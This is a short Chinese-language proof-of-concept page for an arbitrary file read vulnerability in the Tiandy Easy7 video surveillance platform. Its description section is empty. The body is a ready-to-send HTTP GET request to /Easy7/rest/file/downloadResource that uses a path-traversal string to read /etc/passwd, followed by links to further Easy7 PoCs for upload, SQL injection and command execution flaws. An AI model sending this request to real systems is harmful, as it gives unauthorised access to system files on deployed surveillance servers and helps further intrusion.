天地伟业Easy7 downloadResource 任意文件读取漏洞

漏洞描述

PoC代码

GET /Easy7/rest/file/downloadResource?path=/../../../../../../../../etc/passwd HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.2609.50 Safari/537.36

相关漏洞推荐

• 天地伟业Easy7 /Easy7/rest/file/downloadNote 目录遍历漏洞
• 天地伟业Easy7 /Easy7/rest/file/uploadMapServerBgImage 文件上传漏洞
• POC 天地伟业Easy7 uploadMapServerBgImage文件上传
• POC 天地伟业Easy7 downloadNote 任意文件读取
• POC 天地伟业Easy7 downloadWordRecord 任意文件读取漏洞
• POC 天地伟业Easy7 /Easy7/rest/workbook/queryDataByTypeEx SQL 注入漏洞
• POC 天地伟业Easy7 exportGisObj 存在任意文件读取漏洞
• POC 天地伟业Easy7 queryDataByTypeEx SQL注入漏洞
• 天地伟业Easy7综合管理平台druid未授权访问
• 天地伟业Easy7视频监控平台远程命令执行漏洞